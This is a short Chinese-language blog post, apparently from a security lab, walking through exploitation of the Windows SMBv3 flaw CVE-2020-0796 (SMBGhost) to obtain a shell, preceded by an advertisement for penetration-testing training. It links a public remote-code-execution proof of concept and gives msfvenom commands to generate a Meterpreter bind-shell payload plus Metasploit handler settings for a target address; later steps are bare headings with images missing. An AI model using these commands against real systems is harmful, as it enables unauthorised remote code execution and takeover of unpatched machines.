漏洞复现–CVE-2020-0796 getshell
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
漏洞描述:
该漏洞是由SMBv3处理恶意制作的压缩数据包,未经认证攻击者可能利用此漏洞执行任意代码。
测试环境及工具:
windows10 1903 64位下载:
http://xz1.yes025.com/iso/cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso
CVE-2020-0796 “poc”下载:
https://github.com/chompie1337/SMBGhost_RCE_PoC
生成反向连接木马:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b ‘\x00’ -i 1 -f python
msf监听:
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.1.144
run
poc替换:
修改内存为4G以上:
成功getshell
本文来自雷石安全实验室,经授权后发布,本文观点不代表立场,转载请联系原作者。